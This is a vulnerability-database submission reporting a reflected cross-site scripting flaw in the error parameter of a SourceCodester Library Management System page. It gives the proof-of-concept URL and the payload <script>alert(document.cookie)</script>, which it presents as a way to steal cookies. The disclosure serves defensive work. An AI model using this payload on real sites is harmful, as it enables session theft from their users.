Submit #43299: Library Management System front desk /qr/I/ Cross Site Scriptinfo

TitleLibrary Management System front desk /qr/I/ Cross Site Script
Descriptioninfo:Library Management System front desk /qr/I/ Cross Site Script The parameter in index.php of this page is error parameter is not filtered, which can directly xss attack to steal cookie information Direct access to the page address: http://192.168.153.1:8090/qr/I/?error=123 Then replace 123 with xss code <script>alert(document.cookie)</script> Access address: http://192.168.153.1:8090/qr/I/?error=<script>alert(document.cookie)</script> XSS can be achieved payload: /qr/I/?error=<script>alert(document.cookie)</script>
Source⚠️ https:// www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html
User
 jsbae3449 (UID 30775)
Submission08/10/2022 11:23 (4 years ago)
Moderation08/11/2022 11:04 (24 hours later)
StatusAccepted
VulDB entry206164 [SourceCodester Library Management System /qr/I/ Error cross site scripting]
Points20

PreviousOverviewNext

Do you know our Splunk app?

Download it now for free!